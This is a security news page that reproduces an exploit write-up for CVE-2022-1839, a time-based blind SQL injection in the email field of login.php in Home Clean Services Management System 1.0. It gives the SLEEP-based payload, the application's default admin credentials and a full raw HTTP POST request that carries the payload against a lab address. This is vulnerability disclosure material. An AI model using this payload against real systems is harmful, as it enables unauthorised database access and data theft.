Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-1839: webray.com.cn/HCS_login_email_SQL_injection.md at main · Xor-Gerke/webray.com.cn

A vulnerability classified as critical was found in Home Clean Services Management System 1.0. This vulnerability affects the file login.php. The manipulation of the argument email with the input admin%’//AND//(SELECT//5383//FROM//(SELECT(SLEEP(2)))JPeh)//AND/**/’frfq%’=’frfq leads to sql injection. The attack can be initiated remotely but it requires authentication. Exploit details have been disclosed to the public.

CVE
#sql#vulnerability#web#windows#apple#apache#php#auth#chrome#webkit

Permalink

Home Clean Services Management System login.php email SQL injection****Exploit Title: Home Clean Services Management System login.php email SQL injection****Exploit Author: webraybtl@webray.com.cn inc****Vendor Homepage: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html****Software Link: https://www.sourcecodester.com/download-code?nid=15293&title=Home+Clean+Service+System+in+PHP+Free+Source+Code****Version: Home Clean Services Management System 1.0****Tested on: Windows Server 2008 R2 Enterprise, Apache ,Mysql****Description

The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user’s input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Home Clean Services Management System does not filter the content correctly at the “login.php” email module, resulting in the generation of SQL injection.

Payload used:

admin%’//AND//(SELECT//5383//FROM//(SELECT(SLEEP(2)))JPeh)//AND/**/’frfq%’=’frfq

Proof of Concept

  1. Login the CMS. Admin Default Access: Email: admin Password: admin

  2. Open Page http://172.24.5.102/HCS/public_html/

  3. Put sleep(2) payload (asdasd@mail.com’//AND//(SELECT//5383//FROM//(SELECT(SLEEP(2)))JPeh)//AND/**/’frfq%’=’frfq) in the email content and click on Login to publish the page,Viewing the successfully sleep 2 seconds.

  4. code

Host: 172.24.5.102
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Proxyman-Repeated-ID: 235A6C1C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3A9hTgZJbOpWAKqH
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
Cache-Control: max-age=0
Origin: http://172.24.5.102
Referer: http://172.24.5.102/HCS/public_html/index.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Upgrade-Insecure-Requests: 1
Content-Length: 431
Connection: close
Cookie: PHPSESSID=fjbdak9heg1r2divhtlpubv986

------WebKitFormBoundary3A9hTgZJbOpWAKqH
Content-Disposition: form-data; name="email"

asdasd@mail.com'/**/AND/**/(SELECT/**/5383/**/FROM/**/(SELECT(SLEEP(2)))JPeh)/**/AND/**/'frfq%'='frfq
------WebKitFormBoundary3A9hTgZJbOpWAKqH
Content-Disposition: form-data; name="password"

1231312
------WebKitFormBoundary3A9hTgZJbOpWAKqH
Content-Disposition: form-data; name="login"


------WebKitFormBoundary3A9hTgZJbOpWAKqH--

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907